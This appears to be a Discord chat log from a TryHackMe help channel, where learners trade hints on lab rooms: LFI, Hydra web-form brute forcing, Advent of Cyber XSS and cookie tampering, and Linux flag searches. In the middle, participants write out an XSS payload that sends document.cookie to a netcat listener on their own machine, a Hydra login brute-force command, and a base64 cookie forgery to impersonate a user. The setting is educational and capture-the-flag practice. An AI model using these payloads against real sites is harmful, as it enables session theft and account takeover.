what is a write up?

!writeup zthlinux

@odd belfry ^

woow thank you man

anytime

Is there any known problem with deployed machines?

???

@white salmon No

Hi everyone! i guess this is the room i need

FLI basics, i cant read the file and i tried with /../*x but still nothing

In the challenge says you can read the file, so im lost i guess

I did not do the challenge but some times you can right-click to view the source of the page. If its a .log file it should be just text so no reason a browser should not show its content.

usually when having an e.g. include($_GET["page"]) for the url you posted.

@grand pivot so i assume it would normally be like ?page=home or even ?page=about.php or w/e extension 🙂

lets try again so

@grand pivot yea 🙂

Hello everyone

i get it! Thank you! 🙂

can I have a hint on how to find the answer to task 12 question 9?

pee pee poo poo

@dire karma Official warning. One more, you're banned.

@echo thunder i think you need to specify the room

@grand pivot hackback2019

forgot to mention it

sorry

did you complete the room?

can I have a hint on how to find the answer to task 12 question 9 for HackBack 2019 challange?

hi, im here again xD

i need to do uname -r on the lfi basics room

but the blankspace is not a good friend (actually just uname doesnt in either), so i tried with ls and everything is ok. So i guess the structure of the request is fine

and tried with url encode but nothing

and with "+"

could anyone give me a push on inoculation?

@white salmon Osint

OSINT

@grand pivot how to write spaces in urls?

im trying w/o spaces right now

and same problem, so first i have to fix that

@grand pivot uname-r isn't a valid command

im trying now just with "uname" without arguments

anyway, i tried with encoding the url but doesnt work, that's why i give a spet backwards

step*

well, i reboot the mv and clean everything, and use encoding and it works

i get it! Thanks for everyone!

in hackpark, where can I see the theme I uploaded? it's task 2

Can someone help me with day 18 of advent of cyber. I'm trying to get the admin cookie but it just keeps giving me my own session cookie instead

I'm doing this: </p><script>console.log(document.cookie)</script><p>test

@frank ether try to make a persistent xss that sends the cookie to a listening server

https://tryhackme.com/room/hydra Can someone help me with the syntax for the webform? I had the SSH one in a minute and can't get the webform one right whatever I try.

This is what I've tried: ||hydra -l molly -P 10.10.72.240 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V||

Error message: ||[ERROR] Unknown service: /:username=^USER^&password=^PASS^:F=incorrect||

Look at the syntax for hydra http

@signal oak https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/

@still elm I tried using window.location<my ip> + document.cookie but that didn't work either

it messed up the whole web page and it started sending the cookie from my ip for some reason

did you set up a listening service?

it messed up the whole web page and it started sending the cookie from my ip for some reason
@frank ether i know what do you mean. first time i did that i had to redeply the machine 2 times

ya I set it up on port 80

and I waited like 10 minutes

nothing

but it sent my cookie right away

try to stop and restart the service

the weird thing is that it sent it from my ip to my ip

I tried like 6 times

i can't try atm, but i'll check later how i solved that... i need to refresh my memory

sweet thank you

Hi @stuck fractal , thanks for the link! I found that site earlier and tried some stuff but I just don't see it. I think I'm doing something wrong in the first bit after http-post-form.

/ isn't the login page

for a start

Hmmm. Ok. I have the some result with "/login"

Also, you're using the IP address as your password list

Oh haha that would not work.

Running now. Thanks @stuck fractal !

Can't believe I missed that.

@frank ether did you put onload on the script when you send it back to your listener?

i'm not sure what that means

payload or onload?

onload

how would I do that

Dm me

I'm really new to XSS stuff

@still elm You don't need to onload if you have it inline

The code was running

i've tryed without and it didn't work, but maybe i've mispelled something the first time

@stuck fractal do you know if there's something wrong with this:</p><script> window.location = 'http://<local-machine-ip>/page?param=' + document.cookie </script><p>

because that's what @inland onyx did and it worked for him

but ya it's just not working for me

What type of server are you running to listen?

i'm using netcat

on port 80

nc -lvnp 80

Reset it every time you get a cookie, don't touch the webpage after you set the payload

And by local machine IP, what IP are you using?

my vpn ip

Ok

10...

if you want discord not to format stuff, use `around it` and it'll put it in an inline code block

ya i just realized

10.*.**.***

ok i did killall nc and then restarted

so now i'll just wait for the admin to log on hopefully

yea it's been 7 minutes and I haven't gotten any cookie yet

i'll keep waiting but idk if it's working

the web page is just perpetually loading

and it says Waiting for <my ip>

I said don't touch the page

i didn't

i'm gonna retry

I think I may know why it didn't work

I might have to open the port after I inject

...you need a listener running yes

no but I was opening the port before

Doesn't matter

i'm thinking that if i open it right after then it might work

But if you get your own cookie, you need to restart

I feel like i'm the only one who has any problem with these advent of cyber challenges

That's mostly because everyone had the problems back in december

oh true

i got the same exact problem @frank ether and i solved in the way that i've explained. i've tryed and it worked again. i tryed a third time, and now, i get no response (neither my own cookie 😅 )

i just got it actually

I think the trick was to open the port after injecting

thanks for the help

anyone here for a nudge about this challenge

Advent of cyber room

@sand glen Log in as that user

but I don't have the email

The point of the challenge is to break the authentication @sand glen

You know how the server tracks sessions, try becoming that user

I tried editing the cookie but it didn't work xD

Then you didn't quite do it right

Make sure there isn't a 7 in your fixed part

If there's a 7, it's wrong

Use CyberChef to encode and decode

so it's not base64 ?

No, it is.

But if there's a 7 in the fixed part, your decoder is bad

Wait, it might not be a 7

lemme check

Yeah, if there's a 7 then it's a bad decoder

Tends to be if you're using echo "<cookie>" | base64 -d in the terminal

That throws in an extra newline

Same when re-encoding afterwards

CyberChef > all

so I need to use -n flag

You do, @sand glen

@inland onyx can I dm pls?

You may. Thank you for asking

Hi, need help with linux challenges, task4
#7 Locate and retrieve flag 26. I can't find file name flag26, and have to use this : grep -Ril "flag26" / 2>/dev/null , take too long and I don't think it will find the file in short period of time.. any hint?

try using the find command instead

you can do find -name <exact name of file>

That challenge wasn't well thought out, btw. The way the writeup does it is basically bruteforcing for any flags @quaint radish

so find / -name "flag26.txt" 2>/dev/null

That assumes 2 things about the flag

1. That it's a .txt

2. That it's even called flag26

well usually it will tell you though

at least it did for the challenge I just did

ya if it doesn't tell you the exact name of the file then just use grep

so I would do find / 2>/dev/null | grep "flag26"

so basically I have to wait until it find flag26 in a particular file?

ya it searches directories to find the file

how long have you been waiting

hi RimRam.. I did use that, but no file show up

I combined find and grep

one second

Who says "flag26" is in the file?

.huh let me think

ya i'm not a subscriber yet so I can't see the problem

but ya just listen to ninja

he knows a lot more than me anyway

Having seen the solution in the writeup, I disagree with the challenge